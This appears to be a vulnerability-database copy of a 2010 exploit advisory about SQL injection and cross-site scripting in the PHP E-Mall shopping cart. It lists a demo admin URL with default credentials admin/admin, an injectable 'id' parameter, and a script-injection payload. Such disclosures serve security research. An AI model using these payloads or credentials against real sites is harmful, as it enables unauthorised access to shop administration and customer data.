Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormL0rd CrusAd3rPACKETSTORM:90868
HistoryJun 23, 2010 - 12:00 a.m.

PHP E-Mall SQL Injection / Cross Site Scripting

2010-06-2300:00:00
L0rd CrusAd3r
packetstormsecurity.com
20
JSON
`1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-0  
0 _ __ __ __ 1  
1 /' \ __ /'__`\ /\ \__ /'__`\ 0  
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1  
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0  
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1  
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0  
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1  
1 \ \____/ >> Exploit database separated by exploit 0  
0 \/___/ type (local, remote, DoS, etc.) 1  
1 1  
0 [+] Site : Inj3ct0r.com 0  
1 [+] Support e-mail : submit[at]inj3ct0r.com 1  
0 0  
1 ########################################## 1  
0 I'm L0rd CrusAd3r member from Inj3ct0r Team 1  
1 ########################################## 0  
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1  
Author: L0rd CrusAd3r aka VSN [[email protected]]  
Exploit Title:PHP E-Mall SQL Vulnerable & XSS Vulnerable  
Vendor url:http://www.sellatsite.com  
Version:2   
Price:150$  
Published: 2010-06-21  
Greetz to:r0073r (inj3ct0r.com), Sid3^effects, MaYur, MA1201, Sonic Bluehat.  
Special Greetz: Topsecure.net, inj3ct0r Team  
Shoutzz:- To all ICW members  
  
~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~  
Description:  
  
PHP E-Mall is a powerful e commerce shopping mall solution. With your E-Mall, you can setup in just a few hours and be ready to begin selling products in no time. Includes powerful admin CP and the ability to receive payments via PayPal and Authorize.net. Code: PHP 4.0   
  
~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~  
  
Vulnerability:  
  
*SQLi Vulnerability  
  
DEMO URL :  
  
Login Details:-  
  
Username:admin  
password:admin  
  
http://preprojects.com/emall/admin/loginform.php  
  
  
http://preprojects.com/emall/admin/edit_text.php?id=[sqli]  
  
  
  
*XSS Vulnerability  
  
Parameter: '"--><script>alert(0x000872)</script>  
  
DEMO URL:  
  
http://preprojects.com/emall/admin/edit_text.php?id=[xss]  
  
  
# 0day n0 m0re #  
# L0rd CrusAd3r #  
  
  
`
JSON